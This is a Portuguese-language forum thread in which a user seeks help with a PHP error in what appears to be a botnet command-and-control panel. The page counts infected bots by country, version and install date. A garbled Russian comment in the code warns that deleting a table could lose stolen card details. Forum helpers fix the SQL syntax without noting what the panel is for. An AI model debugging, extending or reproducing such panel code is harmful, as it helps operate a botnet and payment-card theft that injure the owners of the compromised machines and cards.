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agradeso ajudas de totus vc muito obrigrado suas informaçaes foro muito boas mais aida tem uma duvida como resover esse erro

Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in D:\xampp\htdocs\sp0012\Main Access Panel\frm_botsmon_country.php on line 35


<script type="text/javascript">

function getState(idc) {

var b = document.getElementById('bfc' + idc);

var tr = document.getElementById('tfc' + idc);

var td = document.getElementById('fc' + idc);

if (b && tr && td) {

if (b.src.indexOf('info.png') == -1) {

b.src = 'img/icos/info.png';

td.innerHTML = '';


else {

ajax_load('frm_botsmon_state.php?idc=' + idc, 'fc' + idc);

b.src = 'img/icos/info-gray.png';






require_once 'mod_dbase.php';

require_once 'mod_bots.php';

require_once 'mod_file.php';

require_once 'bt_update_stuff.php';

$dbase = db_open();

if (!$dbase) exit;

echo "<h2><b>GEO info</b></h2>";


$res = mysqli_query($dbase, "SELECT * FROM country t ORDER BY name country");

$cnt = mysqli_num_rows($res);

if ($cnt > 0) {

require_once 'geoip/geoip.inc';

$gi = new GeoIP;

echo "<script type=\"text/javascript\" charset=\"ISO-8859-1\" src=\"js/alarm.js\"></script>";

echo "<script type=\"text/javascript\" charset=\"ISO-8859-1\" src=\"js/list_stuff.js\"></script>";

echo "<table width='740px' border='1' cellspacing='0' cellpadding='0' style='border: 1px solid gray; font-size: 9px; border-collapse: collapse; background-color: white;'>";

echo "<th>Flag</th>";

echo "<th>Country</th>";

echo "<th>Online Bots/<font class='disabled'>Disabled Bots</font> / All Bots</th>";

echo "<th>Detail State</th>";

for ($i = 0; $mres = mysqli_fetch_array($res); $i++) {

$idc = $mres['id_country'];

$res2 = mysqli_query($dbase, "SELECT count(id_bot) FROM bots_t WHERE (fk_city_bot IN (SELECT id_city FROM city_t, country_t WHERE fk_country_city = id_country AND id_country = " . $idc . ")) AND (status_bot <> 'offline')");

$actb_cnt = -1;

if ((@($res2)) && mysqli_num_rows($res2) > 0) {

$mres2 = mysqli_fetch_array($res2);

$actb_cnt = $mres2[0];


$res2 = mysqli_query($dbase, "SELECT count(id_bot) FROM bots_t WHERE fk_city_bot IN (SELECT id_city FROM city_t, country_t WHERE fk_country_city = id_country AND id_country = " . $idc . ")");

$allb_cnt = -1;

if ((@($res2)) && mysqli_num_rows($res2) > 0) {

$mres2 = mysqli_fetch_array($res2);

$allb_cnt = $mres2[0];

/* if (!$allb_cnt) {

mysqli_query($dbase, "DELETE FROM city_t WHERE fk_country_city = " . $idc . "");

// Òàáëèöó country_t íàäî îñòàâèòü âïîêîå, à òî ìîæåì ïîòåðåòü ðåêâèçèòû êàðò

//mysqli_query($dbase, "DELETE FROM country_t WHERE id_country = " . $idc . "");


} */


$idc = $idc;

$icfg = parse_ini_file('config.ini');

$wait_before_start = $icfg['WAIT_BEFORE_START'];

if (strlen($wait_before_start) != 19) {

$wait_before_start = '1970-04-01 00:00:00';

writelog('error.log', 'Cannot read WAIT_BEFORE_START from config');


$sql = "SELECT count(distinct bots_t.id_bot)"

. " FROM bots_t, bots_rep_t, city_t"

. " WHERE bots_t.id_bot = bots_rep_t.fk_bot_rep"

. " AND bots_t.fk_city_bot = city_t.id_city"

. " AND city_t.fk_country_city = " . $idc

. " AND status_bot <> 'offline'"

. " AND ( bots_rep_t.data_rep like '%sloppy%'"

. " OR UNIX_TIMESTAMP( date_last_run_bot ) >= ( UNIX_TIMESTAMP( now( ) ) - UNIX_TIMESTAMP('" . $wait_before_start . "') )"

. " OR bots_t.blocked = 1"

. " OR bots_t.ver_bot <> " . LAST_VERSION_BOT . " )";

$res2 = mysqli_query($dbase, $sql);

$disb_cnt = 0;

if ((@($res2)) && mysqli_num_rows($res2) > 0) {

$mres2 = mysqli_fetch_array($res2);

$disb_cnt = $mres2[0];


$ccode = 'null';

for ($j = 1; $j <= count($gi->GEOIP_COUNTRY_NAMES); $j++) {

if (!strcmp($gi->GEOIP_COUNTRY_NAMES[$j], $mres['name_country'])) {

$ccode = $gi->GEOIP_COUNTRY_CODES[$j];




if (!$allb_cnt) continue;

echo "<tr align=center' id=\"tid$i\">\n";

echo "<td width='30px'><img border='0' src='img/flags/$ccode.gif'></td>\n";

echo "<td width='200px'>" . $mres['name_country] . "</td>\n";

echo "<td><font style='font-size: 14px;'>($actb_cnt/<font class='disabled'>$disb_cnt</font> / $allb_cnt)</font></td>\n";

echo "<td width='30px'><a href='#null' onclick='getState($idc); return false;'><img id='bfc$idc' src='img/icos/info.png' border='0'></a></td>\n";

echo "</tr>\n";

echo "<tr align='center' id='tfc$idc'>\n";

echo "<td></td><td id='fc$idc' colspan='3'></td>";

echo "</tr>\n";

//if ($actb_cnt - $disb_cnt < 3 && $disb_cnt >= 3 ) {

// echo "<script type=\"text/javascript\">gAlrmElts.push(document.getElementById('tid$i'));</script>";




else {

echo "<p>message>> ERROR IN SELECTION OF 'COUNTRY_T'";



echo "</table>";

echo "<h2><b>Version info</b></h2>";

echo "<table width='240px' border='1' cellspacing='0' cellpadding='0' style='border: 1px solid gray; font-size: 9px; border-collapse: collapse; background-color: white;'>";

echo "<th>Version</th>";

echo "<th>Count (online / all)</th>";

$res = mysqli_query($dbase, "SELECT distinct ver_bot FROM bots_t ORDER BY ver_bot DESC");

for ($i = 0; $mres = mysqli_fetch_array($res); $i++) {

$ver_bot = $mres['ver_bot'];

$res2 = mysqli_query($dbase, "SELECT count(*) FROM bots_t WHERE ver_bot = $ver_bot");

if (!$res2 || !mysqli_num_rows($res)) continue;

$mres2 = mysqli_fetch_array($res2);

$cnta = $mres2[0];

$res2 = mysqli_query($dbase, "SELECT count(*) FROM bots_t WHERE ver_bot = $ver_bot AND status_bot = 'online'");

if (!$res2 || !mysqli_num_rows($res)) continue;

$mres2 = mysqli_fetch_array($res2);

$cnto = $mres2[0];

if (!$i)

echo "<tr align='center'><td>$ver_bot</td><td>$cnto / $cnta</td></tr>";


echo "<tr align='center'><td><font style='color: red;'>$ver_bot</font></td><td>$cnto / $cnta</td></tr>";


echo "</table>";

echo "<h2><b>Count of bots for last 5 days</b></h2>";

echo "<table width='240px' border='1' cellspacing='0' cellpadding='0' style='border: 1px solid gray; font-size: 9px; border-collapse: collapse; background-color: white;'>";

echo "<th>Date</th>";

echo "<th>Count (online / all)</th>";

for ($i = -4; $i != 1; $i++) {

$day1 = $i;

if ($day1 < 0)

$date1 = "$day1 day";

else if ($day1 > 0)

$date1 = "+$day1 day";


$date1 = "now";

//echo "date1 = '$date1'<br>";

$date1 = strtotime($date1);

$date1 = gmdate('Y.m.d', $date1);

//echo "date1 = '$date1'<br>";


$day2 = $i + 1;

if ($day2 < 0)

$date2 = "$day2 day";

else if ($day2 > 0)

$date2 = "+$day2 day";


$date2 = "now";

//echo "date2 = '$date2'<br>";

$date2 = strtotime($date2);

$date2 = gmdate('Y.m.d', $date2);

//echo "date2 = '$date2'<br>";

$sql = "SELECT count(*) FROM bots_t WHERE date_install_bot >= '$date1' AND date_install_bot <= '$date2'";

//echo "sql = '$sql'<br>";

$res2 = mysqli_query($dbase, $sql);

if (!$res2 || !mysqli_num_rows($res)) continue;

$mres2 = mysqli_fetch_array($res2);

$cnta = $mres2[0];

$sql = "SELECT count(*) FROM bots_t WHERE date_install_bot >= '$date1' AND date_install_bot <= '$date2' AND status_bot = 'online'";

//echo "sql = '$sql'<br>";

$res2 = mysqli_query($dbase, $sql);

if (!$res2 || !mysqli_num_rows($res)) continue;

$mres2 = mysqli_fetch_array($res2);

$cnto = $mres2[0];

echo "<tr align='center'><td>$date1</td><td>$cnto / $cnta</td></tr>";


echo "</table>";



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@ smaff

Amigo! É interessante você sempre dar continuidade ao tópico já aberto, desta forma, fica duplicando. Verifique a linha 35 do arquivo D:\xampp\htdocs\sp0012\Main Access Panel\frm_botsmon_country.php pois deve haver alguma incompatibilidade, pois mysqli_num_rows() não está correto.


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mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given

Esse erro se dá porque o que você passou como parâmetro é do tipo boolean. A consulta que você executou está com erro, falta uma vírgula no ORDER BY após o campo 'name', e como a consulta não é executada corretamente é retornado false (boolean) para a variável $res. A consulta deve ser assim (repare na vírgula após o campo name):

$res = mysqli_query($dbase, "SELECT * FROM country t ORDER BY name, country");

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Tente assim então para ver se aparece qual o erro:

$res = mysqli_query($dbase, "SELECT * FROM country t ORDER BY name country") or die();
Aproveita e testa a conexão com o banco também... adiciona isso antes de executar a consulta:

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o erro mudo de linha agora foi para a linha 36 que esa

$res = mysqli_query($dbase, "SELECT * FROM country t ORDER BY name country");

$cnt = mysqli_num_rows($res); LINHA 36

if ($cnt > 0) {

require_once 'geoip/geoip.inc';

$gi = new GeoIP;

Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in D:\xampp\htdocs\sp0012\Main Access Panel\frm_botsmon_country.php on line 36


Edited by smaff
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Verifique por favor a seguinte linha:

$res = mysqli_query($dbase, "SELECT * FROM country t ORDER BY name country");
Veja se o "t" na linha confere com alguma tabela, ou se: country é diferente de "t", vou deixar duas formas, uma sem esse "t", e outra com esse "t" separado.
$res = mysqli_query($dbase, "SELECT * FROM country ORDER BY name, country");
$res = mysqli_query($dbase, "SELECT * FROM country, t ORDER BY name, country");

Quando você for selecionar mais de uma tabela ou campos, vocês tem que separá-los com ( , )vírgula, dê uma estudada no manual do PHP, são erros simples, que podem ser evitados tendo paciência e vontade de aprender.

Forte abraço!!!

Edited by zebra2011
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